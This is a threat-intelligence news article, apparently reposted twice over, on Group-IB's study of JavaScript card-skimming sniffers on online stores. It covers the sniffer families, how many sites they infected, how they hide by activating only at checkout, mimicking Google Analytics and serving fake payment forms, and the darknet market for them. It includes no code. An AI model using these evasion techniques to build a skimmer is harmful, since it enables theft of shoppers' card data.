Online trading market – new threats.
Group-IB, an international company specializing in the prevention of cyber attacks, presented the first analytical report devoted to the study of JavaScript sniffers, a class of malicious code designed to steal bank card data on websites.
The study analyzed 2,440 infected online stores, whose visitors - a total of about one and a half million people per day—were at risk of compromise. The Group-IB report was the first study of the darknet market for sniffers, their infrastructure and methods of monetization, which brings their creators millions of dollars.
Before the release of the Group-IB report “Crime without punishment: analysis of JS sniffer families,” there were no attempts in the Russian cybersecurity industry to systematically study this segment of the underground market. In the international arena, RiskIQ analysts, in partnership with Flashpoint, were the first to release a report on the activities of attackers using JS sniffers. They identified 12 groups under the general name MageCart. Group-IB experts studied the detected sniffers and, using their own analytical systems, were able to examine the entire infrastructure and gain access to source codes, administrator panels and attacker tools. This approach made it possible to identify 38 different families of JS sniffers, distinguished by unique characteristics. Of these, 15 are presented in the report available to Group-IB Threat Intelligence clients. At the same time, at least 8 were discovered and described for the first time in the world.
The threat of JS sniffers for a long time remained outside the attention of antivirus analysts, who considered it insignificant and not requiring in-depth study. However, the 380,000 victims of a JS sniffer that infected the website and mobile application of British Airways, the compromise of payment data of the American ticket distributor Ticketmaster and the recent incident with the British website of the sports giant FILA, when 5,600 customers were at risk of theft of bank card data, indicate the need to change attitudes towards this threat. “When a website is infected, everyone is involved in the chain of victims - end users, payment systems, banks and large companies selling their goods and services via the Internet,” notes Dmitry Volkov, CTO Group-IB. “The fact that almost nothing is known about incidents and damage caused by JS sniffers shows little understanding of this problem and allows groups that create sniffers to steal money from online shoppers to feel impunity.”
According to average estimates, the income of sniffers can be hundreds of thousands of dollars per month. For example, resources infected by the WebRank family of JS sniffers are visited by a total of 250,000 people per day.
If the conversion rate on these sites is only 1%, then 2,500 shoppers are transacting every day. Thus, with a minimum variation in the cost of a stolen card, WebRank operators can earn from $2,500 to $12,500 for one day of “work” as a sniffer. This is from $75,000 to $375,000 per month. At the same time, WebRank is only third in the “rating” of the massive number of infections. Resources infected with MagentoName and CoffeMokko sniffers are visited by 440,000 people a day.
Most of the detected sniffers are aimed at payment forms of certain content management systems - Magento, OpenCart, Shopify, WooCommerce, WordPress. These families include PreMage, MagentoName, FakeCDN, Qoogle, GetBilling, PostEval. Others are universal and can be integrated into the code of any site, regardless of the engine used (G-Analitycs, WebRank).
During the study, signs of “competition” were discovered - some of the studied families of JS sniffers have the functionality of detecting and eliminating JS sniffers of competing groups already working on the victim site (for example, MagentoName). Others use the “body” of a competing sniffer as a parasite, “taking” from it the data that it intercepts and transferring it to their gate (for example, WebRank). Sniffers are modified to make detection more difficult: for example, ImageID, ReactGet, are able to bypass most detection systems due to the fact that they are activated only at the moment the buyer makes a transaction on the site; the rest of the time the sniffer “falls asleep” and does not reveal itself in any way. Some families consist of unique instances, for example, CoffeMokko: each sniffer of this family is used only once to infect one site.
The G-Analytics family is distinguished by the fact that in addition to injecting malicious code into the client part of the site, its authors also use the technique of injecting code into the server part of the site, namely PHP scripts that process user-entered data. This makes it much more difficult for researchers to detect malicious code. JS sniffers like ImageID and G-Analytics are able to imitate legitimate services, for example, Google Analytics and jQuery, masking their activity with legitimate scripts and domain names similar to legitimate ones.
An attack using a JS sniffer can be multi-stage. Analyzing the code of one of the infected stores, Group-IB specialists discovered that in this case the attackers did not limit themselves to introducing a JS sniffer: for a number of reasons, they had to use a full-fledged fake payment form, which was loaded from another compromised site. This form offered the user two payment options: using a credit card or using PayPal. If the user chose to pay via PayPal, he saw a message stating that this payment method was not available at the moment and the only option was a bank card.
JS sniffers cost from $250 to $5000 on underground forums. Some services make it possible to work in partnership: the client provides access to a compromised online store and receives a percentage of the income, and the creator of the sniffer is responsible for hosting servers, technical support and the administrative panel for the client. These very “market relations” between the creators, sellers, intermediaries and buyers of the underground market make it difficult to attribute, that is, correlate the crime committed with a specific group. However, indicators of the operation of each of the 38 families of JS sniffers collected by Group-IB allow us to solve this problem. In addition, the Group-IB report provides detailed recommendations for all parties that may become victims of JS sniffers: buyers, banks, online stores and payment systems. The research continues: descriptions of the analyzed JS sniffers and new data about them appear in the Group-IB Threat Intelligence system.
About Group-IB: Group-IB is one of the leading developers of solutions for detecting and preventing cyber attacks, identifying fraud and protecting intellectual property on the network. The Group-IB Threat Intelligence data collection system for cyber threats is recognized as one of the best in the world according to Gartner, Forrester, IDC.
The company's technological leadership is based on 16 years of experience in investigating cybercrimes around the world and more than 55,000 hours of responding to information security incidents, accumulated in the largest Computer Forensics Laboratory in Eastern Europe and the 24-hour operational response center CERT-GIB. Group-IB is a partner of Interpol and Europol, a provider of cybersecurity solutions recommended by the OSCE.
(c) https://www.klerk.ru/buh/articles/484714/
Group-IB, an international company specializing in the prevention of cyber attacks, presented the first analytical report devoted to the study of JavaScript sniffers, a class of malicious code designed to steal bank card data on websites.
The study analyzed 2,440 infected online stores, whose visitors - a total of about one and a half million people per day—were at risk of compromise. The Group-IB report was the first study of the darknet market for sniffers, their infrastructure and methods of monetization, which brings their creators millions of dollars.
Online trading market: new threats
The online trading market is rapidly developing: according to analysts from Data Insight, by 2023 in Russia it will grow more than 2 times - to 2.4 trillion. rubles The convenience of purchasing goods online has a downside: buyers who use bank cards to pay online face many cyber threats, one of them being a JavaScript sniffer.Before the release of the Group-IB report “Crime without punishment: analysis of JS sniffer families,” there were no attempts in the Russian cybersecurity industry to systematically study this segment of the underground market. In the international arena, RiskIQ analysts, in partnership with Flashpoint, were the first to release a report on the activities of attackers using JS sniffers. They identified 12 groups under the general name MageCart. Group-IB experts studied the detected sniffers and, using their own analytical systems, were able to examine the entire infrastructure and gain access to source codes, administrator panels and attacker tools. This approach made it possible to identify 38 different families of JS sniffers, distinguished by unique characteristics. Of these, 15 are presented in the report available to Group-IB Threat Intelligence clients. At the same time, at least 8 were discovered and described for the first time in the world.
The threat of JS sniffers for a long time remained outside the attention of antivirus analysts, who considered it insignificant and not requiring in-depth study. However, the 380,000 victims of a JS sniffer that infected the website and mobile application of British Airways, the compromise of payment data of the American ticket distributor Ticketmaster and the recent incident with the British website of the sports giant FILA, when 5,600 customers were at risk of theft of bank card data, indicate the need to change attitudes towards this threat. “When a website is infected, everyone is involved in the chain of victims - end users, payment systems, banks and large companies selling their goods and services via the Internet,” notes Dmitry Volkov, CTO Group-IB. “The fact that almost nothing is known about incidents and damage caused by JS sniffers shows little understanding of this problem and allows groups that create sniffers to steal money from online shoppers to feel impunity.”
JavaScript sniffer - a "hidden threat" you don't want to know about
JS sniffer is an online analogue of a skimmer. But if a skimmer is a miniature device that intercepts the user’s bank card data at an ATM, then a JS sniffer is a few lines of code that is implemented by attackers on a website to intercept user-entered data: bank card numbers, names, addresses, logins, passwords, etc. d. Criminals usually sell the received payment data to carders on specialized forums on the darknet. The price of one stolen card ranges from $1 to $5. Less often - 10$-15$. A significant part of forums with offers to buy and rent JS sniffers consists of Russian-speaking cybercriminals.According to average estimates, the income of sniffers can be hundreds of thousands of dollars per month. For example, resources infected by the WebRank family of JS sniffers are visited by a total of 250,000 people per day.
If the conversion rate on these sites is only 1%, then 2,500 shoppers are transacting every day. Thus, with a minimum variation in the cost of a stolen card, WebRank operators can earn from $2,500 to $12,500 for one day of “work” as a sniffer. This is from $75,000 to $375,000 per month. At the same time, WebRank is only third in the “rating” of the massive number of infections. Resources infected with MagentoName and CoffeMokko sniffers are visited by 440,000 people a day.
How JS sniffers attack
A study of 2,440 infected sites showed that more than half were attacked by the MagentoName family of sniffers, whose operators use vulnerabilities in outdated versions of CMS Magento (Content Management System) content management systems to inject malicious code into the code of sites running this CMS. More than 13% of infections are attributed to the WebRank family of sniffers, which use an attack pattern on third-party services to inject malicious code into target sites. Also, more than 11% are infections by sniffers of the CoffeMokko family, whose operators use obfuscated scripts aimed at stealing data from payment forms of certain payment systems, the names of the fields of which are hard-coded in the sniffer code. Such systems include PayPal, Verisign, Authorize.net, eWAY, Sage Pay, WorldPay, Stripe, USAePay and others. Many families of sniffers use unique variants for each individual payment system, which requires modification and testing of the script before each infection.Most of the detected sniffers are aimed at payment forms of certain content management systems - Magento, OpenCart, Shopify, WooCommerce, WordPress. These families include PreMage, MagentoName, FakeCDN, Qoogle, GetBilling, PostEval. Others are universal and can be integrated into the code of any site, regardless of the engine used (G-Analitycs, WebRank).
During the study, signs of “competition” were discovered - some of the studied families of JS sniffers have the functionality of detecting and eliminating JS sniffers of competing groups already working on the victim site (for example, MagentoName). Others use the “body” of a competing sniffer as a parasite, “taking” from it the data that it intercepts and transferring it to their gate (for example, WebRank). Sniffers are modified to make detection more difficult: for example, ImageID, ReactGet, are able to bypass most detection systems due to the fact that they are activated only at the moment the buyer makes a transaction on the site; the rest of the time the sniffer “falls asleep” and does not reveal itself in any way. Some families consist of unique instances, for example, CoffeMokko: each sniffer of this family is used only once to infect one site.
The G-Analytics family is distinguished by the fact that in addition to injecting malicious code into the client part of the site, its authors also use the technique of injecting code into the server part of the site, namely PHP scripts that process user-entered data. This makes it much more difficult for researchers to detect malicious code. JS sniffers like ImageID and G-Analytics are able to imitate legitimate services, for example, Google Analytics and jQuery, masking their activity with legitimate scripts and domain names similar to legitimate ones.
An attack using a JS sniffer can be multi-stage. Analyzing the code of one of the infected stores, Group-IB specialists discovered that in this case the attackers did not limit themselves to introducing a JS sniffer: for a number of reasons, they had to use a full-fledged fake payment form, which was loaded from another compromised site. This form offered the user two payment options: using a credit card or using PayPal. If the user chose to pay via PayPal, he saw a message stating that this payment method was not available at the moment and the only option was a bank card.
Customers and buyers: how the JS sniffer market works
The development of this market has led to a more complex relationship between its players: sniffers can be used both by the specific criminal group that developed it, and by other groups that have purchased or rented the sniffer as part of a Sniffer-As-A-Service. In some cases, it is difficult to determine how many criminal groups use a particular program, which is why Group-IB experts call them families, not groups.JS sniffers cost from $250 to $5000 on underground forums. Some services make it possible to work in partnership: the client provides access to a compromised online store and receives a percentage of the income, and the creator of the sniffer is responsible for hosting servers, technical support and the administrative panel for the client. These very “market relations” between the creators, sellers, intermediaries and buyers of the underground market make it difficult to attribute, that is, correlate the crime committed with a specific group. However, indicators of the operation of each of the 38 families of JS sniffers collected by Group-IB allow us to solve this problem. In addition, the Group-IB report provides detailed recommendations for all parties that may become victims of JS sniffers: buyers, banks, online stores and payment systems. The research continues: descriptions of the analyzed JS sniffers and new data about them appear in the Group-IB Threat Intelligence system.
About Group-IB: Group-IB is one of the leading developers of solutions for detecting and preventing cyber attacks, identifying fraud and protecting intellectual property on the network. The Group-IB Threat Intelligence data collection system for cyber threats is recognized as one of the best in the world according to Gartner, Forrester, IDC.
The company's technological leadership is based on 16 years of experience in investigating cybercrimes around the world and more than 55,000 hours of responding to information security incidents, accumulated in the largest Computer Forensics Laboratory in Eastern Europe and the 24-hour operational response center CERT-GIB. Group-IB is a partner of Interpol and Europol, a provider of cybersecurity solutions recommended by the OSCE.
(c) https://www.klerk.ru/buh/articles/484714/
